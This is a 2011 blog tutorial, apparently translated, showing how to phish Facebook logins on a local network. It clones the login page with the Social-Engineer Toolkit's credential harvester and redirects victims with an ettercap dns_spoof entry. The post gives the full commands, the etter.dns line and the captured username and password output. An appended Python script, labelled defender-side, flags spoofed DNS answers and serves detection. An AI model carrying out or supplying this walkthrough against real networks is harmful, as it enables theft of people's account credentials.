Saturday, November 5, 2011

Phishing with SET and Ettercap-NG

Hello friends, a few days ago my friend red-dragon explained prerouting (described here) for carrying out exploitation. This time my friend red-dragon will try to use the dns_spoof plugin that ships with ettercap-ng to carry out phishing.

The first thing to do is gather information. My friend red-dragon explained this here.
Preparation:
  • Ettercap-NG
  • Social Engineering Toolkit
Note:
  • Stop the Apache web server with the command:
root@bt5r1:~# /etc/init.d/apache2 stop
Walkthrough:

root@bt5r1:~# nmap 172.16.129.1/24

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-25 14:17 WIT
Nmap scan report for 172.16.129.1
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
902/tcp open  iss-realsecure

Nmap scan report for 172.16.129.129
Host is up (0.00070s latency).
Not shown: 993 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
5357/tcp  open  wsdapi
10243/tcp open  unknown
MAC Address: 00:0C:29:71:E6:CF (VMware)

Nmap scan report for 172.16.129.254
Host is up (0.000066s latency).
All 1000 scanned ports on 172.16.129.254 are filtered
MAC Address: 00:50:56:EE:EB:39 (VMware)

Nmap done: 256 IP addresses (3 hosts up) scanned in 10.88 seconds
Once the target is known, we prepare the phishing site using SET. The steps are as follows:
root@bt5r1:~# cd /pentest/exploits/set/
root@bt5r1:/pentest/exploits/set# ./set


  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]                 Version: 2.1                     [---]
  [---]              Codename: 'Rebirth'                 [---]
  [---]       Report bugs: davek@social-engineer.org     [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

     Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]                 Version: 2.1                     [---]
  [---]              Codename: 'Rebirth'                 [---]
  [---]       Report bugs: davek@social-engineer.org     [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

     Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) Third Party Modules

  99) Return back to the main menu.

set> 2

 The Web Attack module is  a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a 
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.
[snip...]

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>6

 The first method will allow SET to import a list of pre-defined web 
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2

After this the phishing site is almost done; what remains is to decide what we want to steal from the victim. Say we want to steal a Facebook account; the steps are as follows:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]

Press {return} to continue.

[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
With this the phishing site is ready. All we have to do is wait for the victim to click the link above printed in purple, i.e. https://login.facebook.com/login.php, or else the victim has to go to our link, 172.16.129.1. Hmm, it seems very hard if we have to wait for the victim to go to that link. So we use DNS spoofing, so that the victim is always directed to our IP whenever they try to access www.facebook.com. Steps:
root@bt5r1:~# nano /usr/share/ettercap/etter.dns

Then add this line at the bottom of the file:
www.facebook.com A 172.16.129.1

This will make the victim always be spoofed to 172.16.129.1 when trying to access www.facebook.com. After that, run this command to activate dns_spoof:
root@bt5r1:~# ettercap -i vmnet8 -T -q -P dns_spoof // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on vmnet8... (Ethernet)

vmnet8 -> 00:50:56:C0:00:08      172.16.129.1     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

After this the preparation is 100% complete. All we have to do is wait for the victim to access our page. See the screenshot of the Windows machine, not spoofed, while accessing Google:
And see when the victim is spoofed to the SET phishing page while accessing www.facebook.com. Here is the report from ettercap:
dns_spoof: [www.facebook.com] spoofed to [172.16.129.1]
Look at the phishing page created by SET: it is identical to the real one, only the URL is different:
And see when the user enters their username and password:
Report from SET:
[*] Information will be displayed to you as it arrives below:
172.16.129.129 - - [25/Oct/2011 14:25:12] "GET / HTTP/1.1" 200 -
10.76.80.63 - - [25/Oct/2011 14:26:24] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
POSSIBLE USERNAME FIELD FOUND: email=doubledragon
POSSIBLE PASSWORD FIELD FOUND: pass=doubledragon
PARAM: persistent=1
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Masuk
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


^C[*] File exported to reports/2011-10-25 14:28:14.508234.html for your reading pleasure...
[*] File in XML format exported to reports/2011-10-25 14:28:14.508234.xml for your reading pleasure...

Press {return} to return to the menu.
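As an added defender-side example (not code from the original post or from SET/ettercap), here is a small Python audit that flags the kind of answer dns_spoof produces in the walkthrough above: a public name such as www.facebook.com resolving to a LAN address, or a local answer that shares no address with a trusted out-of-band resolver. The sample answers, the public addresses and the internal-suffix list are constructed placeholders.

```python
import ipaddress

# Constructed sample answers (not captured from the post). LOCAL is what the
# victim's resolver path returned during the dns_spoof run above; REFERENCE is
# what a trusted out-of-band resolver (e.g. DNS-over-HTTPS via another network
# path) returned for the same names. The public addresses are placeholders.
LOCAL_ANSWERS = {
    "www.facebook.com": ["172.16.129.1"],   # the spoofed answer from the page
    "www.google.com": ["93.184.216.34"],    # unspoofed, matches reference
    "printer.lan": ["172.16.129.50"],       # internal name, private is expected
}
REFERENCE_ANSWERS = {
    "www.facebook.com": ["93.184.216.35"],
    "www.google.com": ["93.184.216.34"],
}

# Suffixes for which a private answer is normal (assumed site convention).
INTERNAL_SUFFIXES = (".lan", ".local", ".internal")


def is_non_routable(ip):
    """True for RFC 1918, loopback and link-local addresses (172.16.129.1 is RFC 1918)."""
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local


def check_answer(name, local_ips, reference_ips=()):
    """Return findings for one name, using two independent signals:
    1. a public name resolving to a non-routable address (the giveaway in
       this walkthrough: www.facebook.com -> 172.16.129.1);
    2. the local answer sharing no address with the reference resolver."""
    findings = []
    internal = name.lower().endswith(INTERNAL_SUFFIXES)
    for ip in local_ips:
        if not internal and is_non_routable(ip):
            findings.append(f"{name} -> {ip}: public name answered with a non-routable address")
    # Only compare when the reference resolver had an answer at all;
    # internal names legitimately have none there.
    if reference_ips and set(local_ips).isdisjoint(reference_ips):
        findings.append(f"{name}: local {sorted(local_ips)} disagrees with reference {sorted(reference_ips)}")
    return findings


def audit(local, reference):
    """Run check_answer over every locally resolved name."""
    findings = []
    for name, ips in local.items():
        findings.extend(check_answer(name, ips, reference.get(name, ())))
    return findings


if __name__ == "__main__":
    for line in audit(LOCAL_ANSWERS, REFERENCE_ANSWERS):
        print("ALERT:", line)
```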

That's all for this tutorial, hope it is useful =))

Created By red-dragon
